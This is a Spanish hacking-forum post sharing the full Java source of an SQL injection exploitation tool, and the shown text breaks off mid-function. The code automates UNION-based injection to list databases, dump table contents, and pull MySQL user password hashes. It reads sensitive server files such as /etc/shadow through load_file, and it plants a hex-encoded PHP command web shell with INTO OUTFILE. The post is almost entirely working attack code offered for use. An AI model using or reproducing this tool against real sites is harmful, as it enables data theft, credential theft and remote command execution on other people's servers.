[Java] SQLI Scanner 0.2

Iniciado por BigBear, Enero 21, 2013, 09:33:17 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Enero 21, 2013, 09:33:17 PM Ultima modificación: Abril 18, 2013, 01:09:38 PM por Expermicid
Traduccion completa de este simple programa para scannear paginas vulnerables a SQLI llamado k0bra que habia hecho antiguamente en Perl.

Con las siguientes opciones :

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados

    Un ejemplo de uso :

    Código: java


    -- == SQLI Scanner 0.2 == --


    [+] Page : 
    http://localhost/sql.php?id=

    [+] Checking ...

    [+] Scanning ...

    [Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
    [Limit] : The site has 3 columns
    [Data] : The number 1 print data

    -- == OPTIONS == --

    --== information_schema.tables ==--
    [1] : Show tables
    [2] : Show columns
    [3] : Show DBS
    [4] : Show tables with other DB
    [5] : Show columns with other DB
    --== mysql.user ==--
    [6] : Show users
    --== Others ==--
    [7] : Fuzzing files with load_file
    [8] : Read a file with load_file
    [9] : Dump
    [10] : Informacion of the server
    [11] : Create a shell with into outfile
    [12] : Show Log
    [13] : Exit

    [Option] :
    10

    [+] Searching informaion ...

    [+] DB Version : 5.5.20-log
    [+] DB Name : hackman
    [+] Username : root@localhost
    [+] information_schema : on
    [+] mysqluser : on
    [-] load_file : off

    [+] Finished





    El codigo es el siguiente :

    Código: java

    // -- == -- == -- == ---- ==
    // SQLI Scanner 0.2       ||
    // -- == -- == -- == ---- ==
    // (C) Doddy Hackman 2013 ||
    // -- == -- == -- == ---- == 

    import java.util.Scanner;
    import java.io.*;
    import java.net.*;

    import java.util.regex.Matcher;
    import java.util.regex.Pattern;

    public class Main {

        public static void main(String[] args) throws Exception {

            String target;
            Scanner host = new Scanner(System.in);

            installer();

            System.out.println("\n\n-- == SQLI Scanner 0.2 == --\n\n");
            System.out.println("[+] Page : ");
            target = host.nextLine();
            scan(target);

    //schematables("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
    //schemacolumns("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers");
    //getdbs("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
    //getablesbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman");
    //getcolbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers");
    //mysqluser("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
    //dumper("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password");
    //fuzzfiles("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
    //openfile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","c:/test.txt");
    //intofile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","C:/Archivos de programa/EasyPHP-5.3.9/www","/");

        }

        private static void manejo(String urla) throws Exception {

            while (true) {
                System.out.println("\n-- == OPTIONS == --\n");
                System.out.println("--== information_schema.tables ==--");
                System.out.println("[1] : Show tables");
                System.out.println("[2] : Show columns");
                System.out.println("[3] : Show DBS");
                System.out.println("[4] : Show tables with other DB");
                System.out.println("[5] : Show columns with other DB");
                System.out.println("--== mysql.user ==--");
                System.out.println("[6] : Show users");
                System.out.println("--== Others ==--");
                System.out.println("[7] : Fuzzing files with load_file");
                System.out.println("[8] : Read a file with load_file");
                System.out.println("[9] : Dump");
                System.out.println("[10] : Informacion of the server");
                System.out.println("[11] : Create a shell with into outfile");
                System.out.println("[12] : Show Log");
                System.out.println("[13] : Exit");

                int op;
                Scanner host = new Scanner(System.in);
                System.out.println("\n[Option] :");
                op = host.nextInt();

                if (op == 1) {
                    schematables(urla);
                    continuar();
                } else if (op == 2) {

                    String coler;

                    Scanner a = new Scanner(System.in);
                    System.out.println("\n[+] Table : ");
                    coler = a.nextLine();

                    schemacolumns(urla, coler);
                    continuar();

                } else if (op == 3) {
                    getdbs(urla);
                    continuar();
                } else if (op == 4) {

                    String tabler;

                    Scanner a = new Scanner(System.in);
                    System.out.println("\n[+] DB : ");
                    tabler = a.nextLine();

                    getablesbydb(urla, tabler);
                    continuar();

                } else if (op == 5) {

                    String dber;
                    String tablerx;

                    Scanner a = new Scanner(System.in);
                    System.out.println("\n[+] DB : ");
                    dber = a.nextLine();

                    Scanner b = new Scanner(System.in);
                    System.out.println("\n[+] Table : ");
                    tablerx = a.nextLine();

                    getcolbydb(urla, dber, tablerx);
                    continuar();

                } else if (op == 6) {

                    mysqluser(urla);
                    continuar();

                } else if (op == 7) {

                    fuzzfiles(urla);
                    continuar();

                } else if (op == 8) {

                    String ar;

                    Scanner f = new Scanner(System.in);
                    System.out.println("\n[+] File : ");
                    ar = f.nextLine();

                    openfile(urla, ar);
                    continuar();

                } else if (op == 9) {

                    String a;
                    String b;
                    String c;

                    Scanner m = new Scanner(System.in);
                    System.out.println("\n[+] Table : ");
                    a = m.nextLine();

                    Scanner n = new Scanner(System.in);
                    System.out.println("\n[+] Column 1 : ");
                    b = n.nextLine();

                    Scanner l = new Scanner(System.in);
                    System.out.println("\n[+] Column 2 : ");
                    c = l.nextLine();

                    dumper(urla, a, b, c);

                    continuar();

                } else if (op == 10) {

                    details(urla);
                    continuar();

                } else if (op == 11) {

                    String b;
                    String c;

                    Scanner m = new Scanner(System.in);
                    System.out.println("\n[+] Full Path Discloure : ");
                    b = m.nextLine();

                    Scanner n = new Scanner(System.in);
                    System.out.println("\n[+] Directory to test : ");
                    c = n.nextLine();

                    intofile(urla, b, c);
                    continuar();

                } else if (op == 12) {

                    String ruta;

                    URL h = new URL(urla);

                    ruta = System.getProperty("user.dir") + "/logs/" + h.getHost() + ".txt";

                    System.out.println("\n[+] Check logs in : " + ruta);
                    continuar();

                } else if (op == 13) {
                    System.out.println("\n-- == (C) Doddy Hackman 2013 == --");
                    continuar();
                    System.exit(1);
                } else {
                    System.out.println("\n[-] Bad Option\n");
                    continuar();
                }

            }
        }

        private static void continuar() throws Exception {
            System.out.println("\n[+] Finished\n");
            Scanner chau = new Scanner(System.in);
            chau.nextLine();
        }

        private static void installer() throws Exception {

            File crear = new File("logs");

            if (!crear.isDirectory()) {
                crear.mkdirs();
            }

        }

        private static void intofile(String urla, String fpd, String dir) throws Exception {

            String linea;
            String lugar;
            String lugardos;
            String webtest;
            String web1;
            String formandoweb;
            String code;

            linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e";
            lugar = fpd + "/cmd.php";
            lugardos = dir + "/cmd.php";

            URL h = new URL(urla);

            System.out.println("\n[+] Checking ...\n");

            webtest = "http://" + h.getHost() + lugardos;
            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", linea);
            formandoweb = web1 + "+into+outfile+'" + lugar + "'--";

            code = toma(formandoweb);
            code = toma(webtest);

            uno = Pattern.compile("Mini Shell By Doddy");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[Shell UP] : " + webtest);
                savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n");
            } else {
                System.out.println("[-] Error");
            }

        }

        private static void openfile(String urla, String file) throws Exception {

            String archivo;
            String web1;
            String code;

            Pattern uno = null;
            Matcher dos = null;

            archivo = encodehex(file);

            web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");

            System.out.println("\n[+] Reading ...\n");

            code = toma(web1);

            uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {

                System.out.println("[+] File Found : " + file);
                System.out.println("\n[Source Start]\n");
                System.out.println(dos.group(1));
                System.out.println("\n[Source End]\n");

                savefile(urla, "\r\n" + "[+] File Found : " + file);
                savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
                savefile(urla, dos.group(1));
                savefile(urla, "\r\n" + "[Source End]" + "\r\n");

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void fuzzfiles(String urla) throws Exception {

            String[] archivos = {"c:/test.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", "/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", "/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", "/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", "C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", "/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", "/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", "/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog"};
            String archivo;
            String web1;
            String code;

            Pattern uno = null;
            Matcher dos = null;

            System.out.println("\n[+] Searching files with load_file() ....\n");

            for (int count = 0; count < archivos.length; count++) {

                archivo = encodehex(archivos[count]);

                web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");

                code = toma(web1);

                uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
                dos = uno.matcher(code);

                if (dos.find()) {

                    System.out.println("[+] File Found : " + archivos[count]);
                    System.out.println("\n[Source Start]\n");
                    System.out.println(dos.group(1));
                    System.out.println("\n[Source End]\n");

                    savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]);
                    savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
                    savefile(urla, dos.group(1));
                    savefile(urla, "\r\n" + "[Source End]" + "\r\n");

                }

            }

        }

        private static void dumper(String urla, String tabla, String col1, String col2) throws Exception {

            String web1;
            String web2;
            String code;
            int x;

            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))");

            code = toma(web1 + "+from+" + tabla + "--");

            System.out.println("\n[+] Getting Values ...");

            uno = Pattern.compile("K0BRA(.*?)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Values Founds : " + dos.group(1));
                savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("\n[+] " + col1 + " : " + dos.group(1));
                        System.out.println("[+] " + col2 + " : " + dos.group(2));

                        savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1));
                        savefile(urla, "[+] " + col2 + " : " + dos.group(2));

                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void mysqluser(String urla) throws Exception {

            String web1;
            String web2;
            String code;
            int x;

            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))");

            System.out.println("\n[+] Searching mysql.user ....");

            code = toma(web1 + "+from+mysql.user--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Users Found : " + dos.group(1));

                savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("\n[+] Host : " + dos.group(1));
                        System.out.println("[+] Username : " + dos.group(2));
                        System.out.println("[+] Password : " + dos.group(3));

                        savefile(urla, "\r\n" + "[+] Host : " + dos.group(1));
                        savefile(urla, "[+] Username : " + dos.group(2));
                        savefile(urla, "[+] Password : " + dos.group(3));

                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void getcolbydb(String urla, String db, String tab) throws Exception {

            String web1;
            String web2;
            String code;

            String dbf;
            String table;

            int x;

            Pattern uno = null;
            Matcher dos = null;

            dbf = encodehex(db);
            table = encodehex(tab);

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");

            System.out.println("\n[+] Getting Columns ....");

            code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");

                savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Column Found : " + dos.group(1));
                        savefile(urla, "[+] Column Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }


        }

        private static void getablesbydb(String urla, String db) throws Exception {

            String web1;
            String web2;
            String code;
            String data;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            data = encodehex(db);

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");

            System.out.println("\n[+] Getting Tables ....");

            code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Tables Found : " + dos.group(1) + "\n");
                savefile(urla, "\r\n" + "[DB] : " + db + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Table Found : " + dos.group(1));
                        savefile(urla, "[+] Table Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }


        }

        private static void getdbs(String urla) throws Exception {

            String web1;
            String web2;
            String code;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))");

            System.out.println("\n[+] Getting DBS ....");

            code = toma(web1 + "+from+information_schema.schemata--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] DBS Found : " + dos.group(1) + "\n");

                savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] DB Found : " + dos.group(1));
                        savefile(urla, "[+] DB Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void schemacolumns(String urla, String nombre) throws Exception {

            String web1;
            String web2;
            String code;
            String tablexa;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            tablexa = encodehex(nombre);

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");

            System.out.println("\n[+] Getting columns ....");

            code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");

                savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Column Found : " + dos.group(1));
                        savefile(urla, "[+] Column Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void schematables(String urla) throws Exception {

            String web1;
            String web2;
            String code;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");

            System.out.println("\n[+] Getting tables ....\n");

            code = toma(web1 + "+from+information_schema.tables--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] Tables Found : " + dos.group(1) + "\n");

                savefile(urla, "");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Table Found : " + dos.group(1));
                        savefile(urla, "[+] Table Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void scan(String urla) throws Exception {

            String codex;
            String target;

            Pattern uno = null;
            Matcher dos = null;

            target = urla;

            System.out.println("\n[+] Checking ...\n");

            codex = toma(target + "-1+union+select+666--");

            uno = Pattern.compile("The used SELECT statements have a different number of columns");
            dos = uno.matcher(codex);

            if (dos.find()) {
                System.out.println("[+] Scanning ...\n");

                int x;
                String urlfinal;
                String otrofinal;
                String code;
                String formariny;
                String otroformar;
                String link;

                urlfinal = "";
                formariny = "";

                for (x = 1; x <= 5; x = x + 1) {

    //urlfinal = urlfinal+x+",";
                    urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
                    formariny = formariny + x + ",";

                    otrofinal = urlfinal;
                    otroformar = formariny;

                    otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
                    otroformar = otroformar.substring(0, otroformar.length() - 1);

                    code = toma(target + "-1+union+select+" + otrofinal);

                    uno = Pattern.compile("RATSXPDOWN(\\d+)");
                    dos = uno.matcher(code);

                    if (dos.find()) {

                        otroformar = otroformar.replace(dos.group(1), "hackman");

                        link = target + "-1+union+select+" + otroformar;

                        System.out.println("[Target] : " + link);
                        System.out.println("[Limit] : The site has " + x + " columns");
                        System.out.println("[Data] : The number " + dos.group(1) + " print data");

                        savefile(link, "\r\n" + "[Target] : " + link);
                        savefile(link, "[Limit] : The site has " + x + " columns");
                        savefile(link, "[Data] : The number " + dos.group(1) + " print data");

                        manejo(link);

                        System.exit(1);

                    }

                }
                System.out.println("[-] Error");
            } else {
                System.out.println("[-] Not vulnerable");
            }

        }

        private static void details(String urla) throws Exception {

            String concat;
            String code;

            Pattern uno = null;
            Matcher dos = null;

            concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";

            urla = urla.replace("hackman", concat);

            System.out.println("\n[+] Searching informaion ...\n");

            code = toma(urla);

            uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] DB Version : " + dos.group(1));
                System.out.println("[+] DB Name : " + dos.group(2));
                System.out.println("[+] Username : " + dos.group(3));

                savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1));
                savefile(urla, "[+] DB Name : " + dos.group(2));
                savefile(urla, "[+] Username : " + dos.group(3));

            } else {
                System.out.println("[-] Not found any data");
            }

            urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");

            code = toma(urla + "+from+information_schema.tables--");
            uno = Pattern.compile("ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] information_schema : on");
                savefile(urla, "[+] information_schema : on");
            } else {
                System.out.println("[-] information_schema : off");
            }

            code = toma(urla + "+from+mysql.user--");
            uno = Pattern.compile("ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] mysqluser : on");
                savefile(urla, "[+] mysqluser : on");
            } else {
                System.out.println("[-] mysquser : off");
            }

